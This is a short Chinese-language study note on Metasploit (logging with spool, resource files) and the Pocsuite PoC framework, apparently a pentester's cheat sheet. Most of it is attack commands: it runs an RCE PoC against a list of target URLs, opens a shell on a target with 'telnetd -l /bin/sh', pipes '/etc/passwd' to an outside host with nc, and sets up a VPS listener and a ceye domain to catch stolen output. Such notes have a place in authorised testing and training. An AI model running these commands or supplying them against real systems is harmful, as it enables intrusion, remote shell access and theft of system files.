pocsuite笔记链接
Metasploit
输出到文件
msf6 > spool log.txt #开启日志,此后命令执行的结果都保存到日志中
msf6 > spool off #关闭日志
文件启动
1.首先将msf命令写入到cmd.rc中
2.然后读配置文件
msfconsole -r cmd.rc
-
Python脚本与metasploit交互批量处理
PocSuite
PoC利用框架
- 按照模板改写已有PoC
- 按照框架获取url
- 构建payload发送requests请求
- 根据返回值生成result字典
- parse_output解析输出,返回成功或失败
- 使用Pocuite调用PoC
#构造url.txt,每条记录可以像下面这样:
https://10.10.10.10:443
#使用rce.py这个PoC去攻击url.txt文件里所有的url
python pocsuite.py -f url.txt -r rce.py --attack --command "whoami" #--command参数可以传递给rce.py
-
关于PoC验证
-
直接反弹shell到vps上,比如:
python rce.py --command "telnetd -l /bin/sh -p 5555" #本地启一个telnet服务运行shell进程 telnet 10.10.10.10 5555 #建立telnet连接
-
如果命令执行有远程返回值,直接看返回值
-
如果没有返回值,将命令执行结果通过nc发送给指定host,如下:
python rce.py --command "cat /etc/passwd | nc 10.10.10.10 5555"
-
ceye上申请域名,用于接收执行结果
-
在vps上监听端口,接收执行结果
nc -lp 5555
-
-
-
参考:
https://blog.csdn.net/weixin_44426869/article/details/103962994